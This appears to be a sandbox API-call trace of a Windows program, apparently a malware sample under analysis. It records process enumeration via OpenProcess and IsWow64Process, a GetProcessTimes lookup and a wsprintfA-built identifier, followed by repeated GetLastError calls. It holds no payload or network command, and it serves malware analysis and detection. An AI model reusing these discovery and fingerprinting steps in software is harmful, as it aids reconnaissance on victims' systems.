	[0083.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0083.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0083.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0083.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0083.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.799] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0083.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0083.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0083.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x504
	[0083.800] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.800] CloseHandle (hObject=0x504) returned 1
	[0083.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7d99d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0083.800] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0083.800] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0083.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7e8110, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0083.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x504
	[0083.801] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.801] CloseHandle (hObject=0x504) returned 1
	[0083.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7e7e70, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0083.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0083.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.801] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x504
	[0083.801] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.801] CloseHandle (hObject=0x504) returned 1
	[0083.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7d99d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0083.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x504
	[0083.802] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.802] CloseHandle (hObject=0x504) returned 1
	[0083.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7d99d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0083.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x504
	[0083.802] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.802] CloseHandle (hObject=0x504) returned 1
	[0083.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7d99d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0083.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x504
	[0083.802] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.802] CloseHandle (hObject=0x504) returned 1
	[0083.802] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7e7e70, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0083.802] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x504
	[0083.802] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.802] CloseHandle (hObject=0x504) returned 1
	[0083.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7d99d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0083.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x504
	[0083.803] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.803] CloseHandle (hObject=0x504) returned 1
	[0083.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0083.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x504
	[0083.803] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.803] CloseHandle (hObject=0x504) returned 1
	[0083.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7d99d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0083.803] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x504
	[0083.803] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.803] CloseHandle (hObject=0x504) returned 1
	[0083.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x504
	[0083.804] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.804] CloseHandle (hObject=0x504) returned 1
	[0083.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7e7e10, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0083.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0083.804] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7d99d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0083.804] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x504
	[0083.804] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.804] CloseHandle (hObject=0x504) returned 1
	[0083.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7e7f30, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0083.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x504
	[0083.805] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.805] CloseHandle (hObject=0x504) returned 1
	[0083.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x76ca70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0083.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x504
	[0083.805] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.805] CloseHandle (hObject=0x504) returned 1
	[0083.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7e7e90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0083.805] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x504
	[0083.805] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.805] CloseHandle (hObject=0x504) returned 1
	[0083.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x7e9910, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0083.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x504
	[0083.806] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.806] CloseHandle (hObject=0x504) returned 1
	[0083.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x7e80f0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0083.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x504
	[0083.806] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.806] CloseHandle (hObject=0x504) returned 1
	[0083.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7d99d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0083.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x504
	[0083.806] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.806] CloseHandle (hObject=0x504) returned 1
	[0083.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x504
	[0083.807] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.807] CloseHandle (hObject=0x504) returned 1
	[0083.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7e7e50, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0083.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x504
	[0083.807] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.807] CloseHandle (hObject=0x504) returned 1
	[0083.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7e8050, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0083.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x504
	[0083.807] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.807] CloseHandle (hObject=0x504) returned 1
	[0083.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x7d99d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0083.807] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x504
	[0083.807] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.807] CloseHandle (hObject=0x504) returned 1
	[0083.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7d99d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0083.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x504
	[0083.808] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.808] CloseHandle (hObject=0x504) returned 1
	[0083.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x7e9550, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0083.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x504
	[0083.808] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.808] CloseHandle (hObject=0x504) returned 1
	[0083.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7d99d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0083.808] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x504
	[0083.808] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.808] CloseHandle (hObject=0x504) returned 1
	[0083.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7d99d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0083.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x504
	[0083.809] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.809] CloseHandle (hObject=0x504) returned 1
	[0083.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7e7e50, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0083.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x504
	[0083.809] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.809] CloseHandle (hObject=0x504) returned 1
	[0083.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7d99d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0083.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x504
	[0083.809] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.809] CloseHandle (hObject=0x504) returned 1
	[0083.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7e7ed0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0083.809] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x504
	[0083.809] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.809] CloseHandle (hObject=0x504) returned 1
	[0083.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x7e9690, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0083.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x504
	[0083.810] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.810] CloseHandle (hObject=0x504) returned 1
	[0083.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x7e9780, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0083.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x504
	[0083.810] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.810] CloseHandle (hObject=0x504) returned 1
	[0083.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7d99d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0083.810] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x504
	[0083.810] GetLastError () returned 0x5
	[0083.810] GetLastError () returned 0x5
	[0083.810] GetLastError () returned 0x5
	[0083.810] GetLastError () returned 0x5
	[0083.810] GetLastError () returned 0x5
	[0083.810] GetLastError () returned 0x5
	[0083.810] GetLastError () returned 0x5
	[0083.810] GetLastError () returned 0x5
	[0083.810] GetLastError () returned 0x5
	[0083.810] GetLastError () returned 0x5
	[0083.810] GetLastError () returned 0x5
	[0083.810] GetLastError () returned 0x5
	[0083.810] GetLastError () returned 0x5
	[0083.810] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetLastError () returned 0x5
	[0083.811] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.812] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0083.812] GetProcessTimes (in: hProcess=0x504, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] wsprintfA (in: param_1=0x770048, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.812] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
